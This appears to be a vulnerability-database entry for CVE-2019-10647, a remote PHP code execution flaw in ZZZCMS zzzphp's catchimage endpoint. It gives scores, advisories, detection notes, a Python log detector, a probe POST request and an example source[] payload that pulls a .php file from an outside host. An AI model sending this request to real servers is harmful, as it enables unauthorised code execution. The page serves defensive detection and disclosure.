CVE-2019-10647
Published 2019-03-30
CVE-2019-10647: ZZZCMS zzzphp v1.6.3 allows remote attackers to execute arbitrary PHP code via a .php URL in the plugins/ueditor/php/controller.php?action=catchimage source[]…
Priority P277 · critical · 9.8 (CVSS 3.0)
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
ITW · Exploit · VulnCheck KEV · Exploited in the wild
EPSS: 6.59% (93.0th percentile)
ZZZCMS zzzphp v1.6.3 allows remote attackers to execute arbitrary PHP code via a .php URL in the plugins/ueditor/php/controller.php?action=catchimage source[] parameter because of a lack of inc/zzz_file.php restrictions. For example, source%5B%5D=http%3A%2F%2F192.168.0.1%2Ftest.php can be used if the 192.168.0.1 web server sends the contents of a .php file (i.e., it does not interpret a .php file).
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| zzzcms | zzzphp | — | — |
Detection & IOCs (extracted from sources)
- path: /inc/zzz_file.php
- path: /upload/
- command (probe request as indexed):

```http
POST /plugins/ueditor/php/controller.php?action=catchimage HTTP/1.1
Content-Type: application/x-www-form-urlencoded

source[]=http://{{interactsh-url}}/{{randstr}}.php
```
- Detect exploitation attempts by monitoring POST requests to /plugins/ueditor/php/controller.php with action=catchimage and a source[] parameter containing a .php URL.
- A successful exploitation results in a JSON response containing both 'SUCCESS' and 'state' fields with HTTP 200, followed by a GET request to /upload/<filename> to retrieve the dropped PHP file.
- Monitor for out-of-band DNS interactions triggered by the catchimage endpoint fetching attacker-controlled URLs ending in .php; these indicate an SSRF/RCE probe.
- The exploit requires the attacker-controlled server to serve PHP code as plain text (not interpreted), so look for HTTP responses with PHP code bodies being fetched by the target server.
- After the catchimage fetch, the uploaded PHP file is stored under /upload/ and can be accessed via GET; monitor GET requests to /upload/*.php as a sign of post-exploitation access.
- Exploitation requires the attacker-controlled server to serve the .php file as plain text (Content-Type: text/plain or similar) rather than executing it; the vulnerability is the target's lack of file-type restriction, not the source server's PHP execution.
- The Nuclei template uses a two-step flow: step 1 triggers the catchimage fetch and confirms the DNS OOB interaction and the SUCCESS response; step 2 GETs the uploaded file. Both steps must succeed for confirmed exploitation.
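As an added illustration of the detection guidance above (example code, not part of any indexed source), the following Python log triage flags catchimage POSTs whose source[] points at a .php URL and correlates them with later GETs to /upload/*.php from the same client. The log line format, client addresses and URLs are constructed for the example.

```python
from urllib.parse import urlparse, parse_qs

# Constructed sample lines (not from the page): "client method target status body"
SAMPLE_LOG = """\
203.0.113.7 POST /plugins/ueditor/php/controller.php?action=catchimage 200 source%5B%5D=http%3A%2F%2F198.51.100.9%2Fshell.php
203.0.113.7 GET /upload/20190330abcdef.php 200 -
198.51.100.22 POST /plugins/ueditor/php/controller.php?action=catchimage 200 source%5B%5D=http%3A%2F%2Fcdn.example%2Fimg.png
198.51.100.22 GET /upload/20190330img.png 200 -
"""

CATCHIMAGE_PATH = "/plugins/ueditor/php/controller.php"


def parse_line(line):
    """Split one constructed log line into its fields; the body is the raw POST form."""
    client, method, target, status, body = line.split(" ", 4)
    url = urlparse(target)
    return {"client": client, "method": method, "path": url.path,
            "query": parse_qs(url.query), "status": int(status), "body": body}


def php_sources(body):
    """Return the source[] values whose (percent-decoded) URL path ends in .php."""
    params = parse_qs(body)  # decodes source%5B%5D -> source[] and the URL value
    return [src for src in params.get("source[]", [])
            if urlparse(src).path.lower().endswith(".php")]


def detect(log_text):
    """Two-stage correlation: catchimage fetch of a .php URL, then GET of /upload/*.php."""
    findings, suspects = [], set()
    for raw in log_text.splitlines():
        ev = parse_line(raw)
        if (ev["method"] == "POST" and ev["path"] == CATCHIMAGE_PATH
                and "catchimage" in ev["query"].get("action", [])):
            hits = php_sources(ev["body"])
            if hits:
                suspects.add(ev["client"])
                findings.append(("catchimage_php_fetch", ev["client"], hits[0]))
        elif (ev["method"] == "GET" and ev["path"].startswith("/upload/")
              and ev["path"].lower().endswith(".php") and ev["client"] in suspects):
            findings.append(("upload_php_access", ev["client"], ev["path"]))
    return findings


if __name__ == "__main__":
    for kind, client, detail in detect(SAMPLE_LOG):
        print(f"{kind}: client={client} {detail}")
```

The benign catchimage fetch of an image URL produces no finding, so only the .php fetch and its follow-up access are reported.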
CVSS provenance

| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 9.8 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |
| vulncheck | — | 9.8 | CRITICAL | — |
GHSA
GHSA-pgwh-xwg9-pvxq: ZZZCMS zzzphp v1 (CVE-2019-10647, CRITICAL, CWE-434)
ghsa_unreviewed · 2022-05-14
VulnCheck
zzzcms zzzphp Unrestricted Upload of File with Dangerous Type (CVE-2019-10647, CRITICAL)
vulncheck · 2019 · CVSS 9.8
Affected: zzzcms zzzphp
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://api.vulncheck.com/v3/index/sans-dshield?cve=CVE-2019-10647
No detection rules found.
Nuclei
ZZZCMS ZZZPHP 1.6.3 – Remote PHP Code Execution (RCE) (CVE-2019-10647, CRITICAL)
nuclei · CVSS 9.8
ZZZCMS zzzphp v1.6.3 contains a remote code execution vulnerability caused by a lack of restrictions in inc/zzz_file.php, letting attackers execute arbitrary PHP code via a crafted URL in the plugins/ueditor/php/controller.php?action=catchimage source[] parameter. Exploitation requires the attacker to supply a malicious URL and the server at that URL to serve PHP code as plain text.
Template:

```yaml
id: CVE-2019-10647

info:
  name: ZZZCMS ZZZPHP 1.6.3 – Remote PHP Code Execution (RCE)
  author: Sourabh-Sahu
  severity: critical
  description: |
    ZZZCMS zzzphp v1.6.3 contains a remote code execution caused by lack of restrictions in inc/zzz_file.php, letting attackers execute arbitrary PHP code via a crafted URL in the plugins/ueditor/php/controller.php?action=catchimage source[] parameter, ex
```
No writeups or analysis indexed.
Timeline: 2019-03-30 published; exploited in the wild.